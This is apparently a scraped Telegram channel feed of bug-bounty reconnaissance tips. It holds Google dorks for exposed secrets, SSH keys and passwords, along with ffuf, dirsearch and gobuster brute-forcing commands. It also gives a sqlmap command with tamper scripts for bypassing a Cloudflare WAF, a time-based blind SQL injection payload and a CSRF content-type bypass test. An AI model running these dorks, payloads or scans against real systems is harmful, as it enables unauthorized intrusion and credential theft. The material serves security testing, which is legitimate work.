ExploitQuest
Top 25 JavaScript path files used to store sensitive information in Web Application 01. /js/config.js 02. /js/credentials.js 03. /js/secrets.js 04. /js/keys.js 05. /js/password.js 06. /js/api_keys.js 07. /js/auth_tokens.js 08. /js/access_tokens.js 09. /js/sessions.js…
Dork :
intitle:"index of" inurl:"/js/" ("config.js" | "credentials.js" | "secrets.js" | "keys.js" | "password.js" | "api_keys.js" | "auth_tokens.js" | "access_tokens.js" | "sessions.js" | "authorization.js" | "encryption.js" | "certificates.js" | "ssl_keys.js" | "passphrases.js" | "policies.js" | "permissions.js" | "privileges.js" | "hashes.js" | "salts.js" | "nonces.js" | "signatures.js" | "digests.js" | "tokens.js" | "cookies.js" | "topsecr3tdonotlook.js")❤4👍1
This media is not supported in your browser
VIEW IN TELEGRAM
- Are you ready, kids?
- Yes, !
- I can't hear you!
- Yes sir, !
- Whooo... who is burning out in front of the screen?
- BUG-HUNTER!
- A top hacker in hookah smoke?
- BUG-HUNTER!
- Who breaks the scope always and everywhere?
- BUG-HUNTER!
- Do you like to party in trendy merch?
- BUG-HUNTER!
- Skilled and dexterous, not a fan of discussions?
- BUG-HUNTER!
- Looking for crits without any illusions?
- BUG-HUNTER!
- Who writes a full report to the vendor?
- BUG-HUNTER!
- Sparing no effort during the nights of the narpolet?
- BUG-HUNTER!
- Who wants the maximum bounty payouts?
- BUG-HUNTER!
- All thanks to your brilliant ingenuity?
- BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TEEEER!
- Yes, !
- I can't hear you!
- Yes sir, !
- Whooo... who is burning out in front of the screen?
- BUG-HUNTER!
- A top hacker in hookah smoke?
- BUG-HUNTER!
- Who breaks the scope always and everywhere?
- BUG-HUNTER!
- Do you like to party in trendy merch?
- BUG-HUNTER!
- Skilled and dexterous, not a fan of discussions?
- BUG-HUNTER!
- Looking for crits without any illusions?
- BUG-HUNTER!
- Who writes a full report to the vendor?
- BUG-HUNTER!
- Sparing no effort during the nights of the narpolet?
- BUG-HUNTER!
- Who wants the maximum bounty payouts?
- BUG-HUNTER!
- All thanks to your brilliant ingenuity?
- BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TEEEER!
😁8👍3🫡3
ffuf -u http://target.com/FUZZ -w wordlist.txt -e .json,.xml,.bak,.sql,.zip,.log,.config,.env -c -t 50 -recursion -recursion-depth 2 -s -mc 200,301,302 -o results.json
❤9
What does the command do?
Searches for hidden or useful files or paths within the list of links. It is used in security testing to detect sensitive or exposed files on the server.
dirsearch -l urls.txt -e
conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx
~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,con
f,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,ol
d,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,t
ar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-
recursive --force-recursive --exclude-sizes=0B --
random-agent --full-url -o output.txt
👍5🔥4❤1
👍4👏1
This media is not supported in your browser
VIEW IN TELEGRAM
Bruteforce directories and files :
a simple example of using gobuster , but you can also work with ffuf , feroxbuster and other tools
• dir : directory scanning mode
• -u : target URL
• -w : path to dictionary
Other useful parameters:
• -x : file extensions ( .php , .html )
• -t : number of threads
• -c : cookie
a simple example of using gobuster , but you can also work with ffuf , feroxbuster and other tools
• dir : directory scanning mode
• -u : target URL
• -w : path to dictionary
Other useful parameters:
• -x : file extensions ( .php , .html )
• -t : number of threads
• -c : cookie
🔥10
ExploitQuest
Photo
A simple CSRF bypass to check if your target is sending JSON data without an anti-CSRF token
Change the content type from application/json to text/plain and see if it still accepts the request
Steps to Check for CSRF Bypass
Identify the Target Request:
Find the endpoint that accepts JSON data and requires CSRF protection.
Capture the Request:
Use tools like Burp Suite, Postman, or browser developer tools to capture the original request.
Original Request (expected by the server):
POST /api/profile HTTP/2
Host: app.example.com
Cookie: sess=eyJ... # Session Cookie
Content-Type: application/json
{
"email": "test@example.com"
}
Modified Request (for testing CSRF bypass):
POST /api/profile HTTP/2
Host: app.example.com
Cookie: sess=eyJ... # Session Cookie
Content-Type: text/plain
{
"email": "test@example.com"
}
Expected Results:
If the server accepts the request:
The endpoint may not validate the Content-Type.
This can allow a malicious actor to exploit the endpoint using CSRF.
If the server rejects the request:
It validates the Content-Type, which is a good security practice.
This reduces the risk of CSRF exploitation
❤7👍2
One line to find all subdomains of a target site and list the favicon hashes.
The latter can be used in conjunction with Shodan to find all web applications using the same favicon.
The latter can be used in conjunction with Shodan to find all web applications using the same favicon.
subfinder -d canva.com | httpx -favicon -j | jq -r .favicon | grep -v null | sort-u
🔥3
Bypass waf for SQL injection :)
cloudflare
command :
time-based blind:
cloudflare
command :
sqlmap -u "target.com" --dbs --batch --time-sec 10 --level 3 --hex --random-agent --tamper=space2comment,betweeny
time-based blind:
+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO)
🔥7👍4❤2
Here are 10 Google Dorks that are new and useful for bug bounty hunters during reconnaissance:
1•Finding Configuration or Settings Files
inurl:settings filetype:json OR filetype:xml
•Purpose: Locate configuration files that might contain sensitive keys or settings.
2•Searching for Backup Files on Servers
intitle:index.of "backup" OR "bkp" OR "bak"
•Purpose: Identify exposed backup files in public directories.
3•Discovering Application Error Logs
inurl:error.log OR inurl:debug.log filetype:log
•Purpose: Find log files that may reveal sensitive server paths or IP addresses.
4•Locating Database Configuration Files
inurl:dbconfig OR inurl:database filetype:ini OR filetype:env
•Purpose: Expose database settings or credentials.
5•Finding Exposed API Endpoints
inurl:api OR inurl:swagger filetype:json
•Purpose: Identify exposed APIs or Swagger documentation.
6•Searching for Private SSH Keys
intitle:index.of id_rsa OR id_dsa filetype:key
•Purpose: Detect publicly accessible SSH private keys.
7•Exposing Hardcoded Passwords
intext:"password=" OR "pwd=" OR "pass=" filetype:properties OR filetype:txt
•Purpose: Find plaintext passwords in configuration or text files.
8•Finding Confidential Documents
site:example.com filetype:pdf OR filetype:xls "confidential"
•Purpose: Locate sensitive or confidential documents.
9•Detecting Files with Exported Data
inurl:exports OR inurl:downloads filetype:csv OR filetype:txt
•Purpose: Discover exported user data or logs.
10•Identifying Cloud Configuration Files
intext:"cloud" OR "aws" OR "gcp" filetype:yml OR filetype:yaml
•Purpose: Expose cloud service configurations such as AWS or GCP.
👍11❤4🔥4
How do hackers find hidden pages on your site?
It's not magic, it's technique.
It's called Web Fuzzing.
And if you're a developer, a pentester, or just curious, you know that this method is daunting.
Here is a quick example with a well-known tool, but that admins forget too quickly: FFUF (Fuzz Faster U Fool).
🛠 Examples of use:
• Fuzzing with custom headers:
• Recursive Fuzzing with Specific Depth:
• Targeting specific patterns in responses:
Why does it work?
Because sites are like untidy houses. There is always a door left ajar.
Fuzzing uses lists of words (often obvious combinations or common names) to force URLs, explore forgotten areas... and reveal login pages, more or less sensitive resources.
But the real danger? It is not the tool.
It is a site that was designed without taking these attacks into account.
It's not magic, it's technique.
It's called Web Fuzzing.
And if you're a developer, a pentester, or just curious, you know that this method is daunting.
Here is a quick example with a well-known tool, but that admins forget too quickly: FFUF (Fuzz Faster U Fool).
🛠 Examples of use:
• Fuzzing with custom headers:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -H "Custom-Header: value"
• Recursive Fuzzing with Specific Depth:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -recursion -recursion-depth 2
• Targeting specific patterns in responses:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -mr "regex-pattern"
Why does it work?
Because sites are like untidy houses. There is always a door left ajar.
Fuzzing uses lists of words (often obvious combinations or common names) to force URLs, explore forgotten areas... and reveal login pages, more or less sensitive resources.
But the real danger? It is not the tool.
It is a site that was designed without taking these attacks into account.
🔥6👍1